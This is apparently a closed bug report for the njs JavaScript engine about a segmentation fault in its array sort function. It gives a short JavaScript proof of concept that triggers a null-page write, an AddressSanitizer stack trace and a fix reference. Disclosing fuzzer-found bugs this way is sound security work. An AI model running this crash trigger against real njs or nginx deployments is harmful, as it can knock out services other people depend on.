# Key Information ## Vulnerability Title SEGV in njs_array_prototype_sort ## Vulnerability Status Closed ## Vulnerability Description A segmentation fault (SEGV) exists in the array sorting function `njs_array_prototype_sort`. ## Environment Information - **Operating System**: Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux - **Commit Version**: `f65981b` - **NJS Version**: 0.7.3 - **Build Configuration**: - `NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"` - `NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"` ## Proof of Concept (PoC) ```javascript function main() { var empty = {}; var arr1 = [empty, empty]; function func(arg) { arr1[0xffff] *= arg; } var v5 = arr1.sort(func); } main(); ``` ## Stack Trace ```plaintext AddressSanitizer:DEADLYSIGNAL ============== ==610159==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff6f91b13 bp 0x7fffffffb3d0 sp 0x7fffffffca70 T0) ==610159==The signal is caused by a WRITE memory access. ==610159==Hint: address points to the zero page. #0 0x7ffff6f91b12 in mempcpy (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12) #1 0x7ffff7688d40 in __asan_memcpy ../../../../src/libsanitizer/asan/asan_interceptors_memintrinsics.cc:2100 #2 0x5555556042ff in njs_array_prototype_sort src/njs_array.c:2704 #3 0x55555561961c in njs_function_native_call src/njs_function.c:739 #4 0x5555555f0f5b in njs_vmcode_interpreter src/njs_vmcode.c:788 #5 0x555555618aba in njs_function_lambda_call src/njs_function.c:703 #6 0x5555555bf0fb in njs_vmcode_interpreter src/njs_vmcode.c:788 #7 0x55555555b90a in njs_vm_start src/njs_vm.c:553 #8 0x5555555a23f8 in njs_process_script src/njs_shell.c:890 #9 0x5555555a2ebf in njs_process_file src/njs_shell.c:619 #10 0x5555555a421f in main src/njs_shell.c:303 #11 0x7ffff6fba0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #12 0x55555559fc4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12) in mempcpy ==610159==ABORTING ``` ## Fix Commit Fixed in [8b39afd](#) ## Contributors - xmzyshypnc (@xmzyshypnc) - P1umer (@P1umer) - xeioex (@xeioex) ## Tags - bug - fuzzer